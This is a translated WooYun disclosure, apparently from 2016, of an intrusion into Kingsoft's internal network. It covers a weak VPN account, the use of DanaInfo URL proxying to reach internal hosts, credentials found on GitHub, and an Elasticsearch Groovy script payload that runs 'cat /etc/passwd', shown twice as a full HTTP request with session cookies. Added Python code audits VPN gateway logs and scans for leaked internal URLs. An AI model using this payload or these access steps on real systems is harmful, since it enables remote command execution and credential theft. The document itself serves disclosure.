神刀安全网

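Vulnerability title: Misconfiguration at Kingsoft leads to disclosure of internal sensitive information

Vulnerability details

Disclosure status:

2016-03-30: Details reported to the vendor; awaiting vendor handling
2016-03-30: Vendor confirmed; details disclosed to the vendor only
2016-04-09: Details disclosed to core white hats and experts in related fields
2016-04-19: Details disclosed to regular white hats
2016-04-29: Details disclosed to intern white hats
2016-05-14: Details disclosed to the public

Brief description:

I decided to report it after all. This vulnerability shows in full what happens when security details are neglected.

Detailed description:

This is an extension of the report "WooYun: Juniper VPN flaw allows bypassing SMS/token verification, leading to roaming of the internal network". That report mentioned a Kingsoft weak password, which was never fixed. I'm speechless; did they think it really could not be exploited?

Visit

Code: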
https://ksvpn.kingsoft.com/dana-na/auth/url_2/welcome.cgi

Bypass the dynamic token restriction

Username and password: test [email protected]

Login succeeded

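The iciba (词霸) admin backend has an injection flaw.

But at this point there seemed to be no resources to access, and nothing more could be done.

After fiddling for a long time, I found a place to start:

Code: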
https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27

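In the DanaInfo part of the URL, it appears you can fill in a URL of your own choosing to reach other resources.

Requesting www.iciba.com through it succeeded, which shows that this works. Some backends still could not be reached, but it is good news all the same.

Why?

Because the iciba backend cannot be reached from the external network. This shows that when the vendor set up its protections, for example in nginx, it certainly restricted some external IPs with access control. The VPN's IP, however, has most likely not been restricted, so it can reach some internal resources and the backends that are blocked from the outside.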
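As an added example (not part of the original report), the following Python code shows how a defender could audit gateway access logs for this pattern: it parses the `DanaInfo=` rewritten-URL form seen in the two URLs of this report and flags requests whose target host or port falls outside the resource policy of the account. The `(user, path)` record layout, the `POLICY` table and the function names are assumptions, and the sample records are constructed from the URLs quoted in this report.

```python
import re
from fnmatch import fnmatchcase

# Rewritten-URL form seen in this report:
#   /<dir>,DanaInfo=<host>[,Key=Value...]+<file>?<query>
DANAINFO_RE = re.compile(
    r",DanaInfo=(?P<host>[^,+\s]+)(?P<opts>(?:,[^,+\s]+)*)\+(?P<rest>\S*)"
)

def parse_danainfo(path):
    """Return (host, port, inner_path) for a rewritten URL, or None."""
    m = DANAINFO_RE.search(path)
    if m is None:
        return None
    port = None
    for opt in m.group("opts").split(","):
        key, _, value = opt.partition("=")
        if key == "Port" and value.isdigit():
            port = int(value)
    prefix = path[:m.start()]  # directory part before ",DanaInfo="
    return m.group("host").lower(), port, prefix + m.group("rest")

# Hypothetical per-account resource policy: host patterns each account may reach.
POLICY = {"test": ["www.iciba.com"]}
WEB_PORTS = (None, 80, 443)  # None means no explicit Port= option was given

def audit(records, policy):
    """Flag proxied requests whose target is outside the account's policy."""
    findings = []
    for user, path in records:
        parsed = parse_danainfo(path)
        if parsed is None:
            continue  # not a proxied request (e.g. the sign-in page)
        host, port, _inner = parsed
        reasons = []
        if not any(fnmatchcase(host, pat) for pat in policy.get(user, ())):
            reasons.append("host-not-in-policy")
        if port not in WEB_PORTS:
            reasons.append("non-web-port")
        if reasons:
            findings.append((user, host, port, tuple(reasons)))
    return findings

# Constructed sample records, built from the URLs quoted in this report.
SAMPLE_RECORDS = [
    ("test", "/dana-na/auth/url_2/welcome.cgi"),
    ("test", "/,DanaInfo=www.iciba.com+"),
    ("test", "/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27"),
    ("test", "/,DanaInfo=elasticsearch.kisops.com,Port=9200+_search?pretty"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RECORDS, POLICY):
        print(finding)
```

The same allowlist belongs in the gateway's own resource policy; the log audit only shows where the current policy is wider than intended.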

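This is where GitHub and subdomain brute-force tools come in. GitHub holds a large number of internal system domain names, because employees think "it sits on the internal network, so what can you do with it?" Subdomain brute-force tools can enumerate large numbers of internal system domain names.

Code: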
https://github.com/wangxulin/portal_ops/blob/master/sites.json

Sure enough, a short search turned it up.


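A large number of internal system domain names.

I then used the internal domain kisops.com for subdomain brute-forcing from the external network and tried to access the results.

Some resources were accessed successfully.

Code:
Data-center traffic management system: http://101.251.206.18:9080/nfsen/nfsen.php

Not reachable from the external network; reachable inside the VPN, but a password is required.

Making use of what is at hand:

Code: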
https://github.com/wangxulin/cmz/blob/9fc0715e999cec23b92f310cd504c44a4e4b205e/app/memcached/forms.py

I saw one on GitHub that looked usable, tried it, and logged in successfully.

I'm speechless. Do you really dare to upload everything to GitHub?
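As an added example (not part of the original report), the following Python check is one way to catch this kind of leak before a repository is pushed: it scans file text for URLs that point at private IP addresses or at domains reserved for internal systems. The function names and the suffix list are assumptions, and the sample records are constructed in the shape of a navigation file like the one described above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")

def classify_host(host, internal_suffixes):
    """Return a reason string if the host looks internal, else None."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return "private-ip" if ip.is_private else None
    host = host.lower().rstrip(".")
    for suffix in internal_suffixes:
        # Match the suffix on a label boundary so "notkisops.com" is not flagged.
        if host == suffix or host.endswith("." + suffix):
            return "internal-domain"
    return None

def scan_text(text, internal_suffixes):
    """Return (line_number, host, reason) for every internal URL in the text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            try:
                host = urlsplit(url).hostname
            except ValueError:
                continue  # malformed URL, e.g. a broken IPv6 literal
            if not host:
                continue
            reason = classify_host(host, internal_suffixes)
            if reason:
                findings.append((lineno, host, reason))
    return findings

# Assumed list of domains that should never appear in public repositories.
INTERNAL_SUFFIXES = ["kisops.com"]

# Constructed sample in the shape of a navigation-site export.
SAMPLE = """\
{ "url" : "http://elasticsearch.kisops.com:9200/", "title" : "search" }
{ "url" : "http://10.0.0.5/login.php", "title" : "old release system" }
{ "url" : "https://github.com/", "title" : "public site" }
"""

if __name__ == "__main__":
    hits = scan_text(SAMPLE, INTERNAL_SUFFIXES)
    for lineno, host, reason in hits:
        print(f"line {lineno}: {host} ({reason})")
    # A non-zero exit status lets a pre-commit hook or CI job block the push.
    raise SystemExit(1 if hits else 0)
```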

webserver management

Automated installation system

elasticsearch data platform

Unpatched, so commands can be executed directly.

Code:
GET /,DanaInfo=elasticsearch.kisops.com,Port=9200+_search?pretty HTTP/1.1
Host: ksvpn.kingsoft.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: DSSignInURL=/; DSFirstAccess=1459265428; DSCK:iciba_suggest_power=1%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A50%3A55%20GMTundefined%3B%20%20path%3D/%3B%20%20domain%3Dwww.iciba.com%3B%20; DSCK:CNZZDATA5816172=cnzz_eid%253D200427511-1459263058-%2526ntime%253D1459263058%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A01%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dcp.cmcm.com%3B%20; DSCK:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA4043849=cnzz_eid%253D570930719-1459257264-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459262939%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:Hm_lvt_5ac0d8ae079c0cc365232a92e683cd42=1459262371%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A58%3A02%20GMT%3B%20; DSCK:/:DSPT:Hm_lpvt_5ac0d8ae079c0cc365232a92e683cd42=1459267083%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20; DSCK:/:DSPT:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA1535626=cnzz_eid%253D1460670884-1459259525-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459264925%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSID=42fe302e7ee039b6fd97eb0c1b3b2607; DSLastAccess=1459267992
Content-Length: 410

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(/"java.io.BufferedReader/").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(/"java.io.InputStreamReader/").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(/"java.lang.Runtime/").getRuntime().exec(/"cat /etc/passwd/").getInputStream())).readLines()","lang": "groovy"}}}


shadow is readable


Proof of vulnerability:

Code:
GET /,DanaInfo=elasticsearch.kisops.com,Port=9200+_search?pretty HTTP/1.1
Host: ksvpn.kingsoft.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: DSSignInURL=/; DSFirstAccess=1459265428; DSCK:iciba_suggest_power=1%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A50%3A55%20GMTundefined%3B%20%20path%3D/%3B%20%20domain%3Dwww.iciba.com%3B%20; DSCK:CNZZDATA5816172=cnzz_eid%253D200427511-1459263058-%2526ntime%253D1459263058%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A01%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dcp.cmcm.com%3B%20; DSCK:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA4043849=cnzz_eid%253D570930719-1459257264-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459262939%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:Hm_lvt_5ac0d8ae079c0cc365232a92e683cd42=1459262371%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A58%3A02%20GMT%3B%20; DSCK:/:DSPT:Hm_lpvt_5ac0d8ae079c0cc365232a92e683cd42=1459267083%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20; DSCK:/:DSPT:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA1535626=cnzz_eid%253D1460670884-1459259525-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459264925%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSID=42fe302e7ee039b6fd97eb0c1b3b2607; DSLastAccess=1459267992
Content-Length: 410

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(/"java.io.BufferedReader/").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(/"java.io.InputStreamReader/").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(/"java.lang.Runtime/").getRuntime().exec(/"cat /etc/passwd/").getInputStream())).readLines()","lang": "groovy"}}}


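Remediation:

Patch the vulnerabilities that need patching, and educate your employees properly.

Copyright notice: when reposting, please credit the source: if、so@WooYun (乌云)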
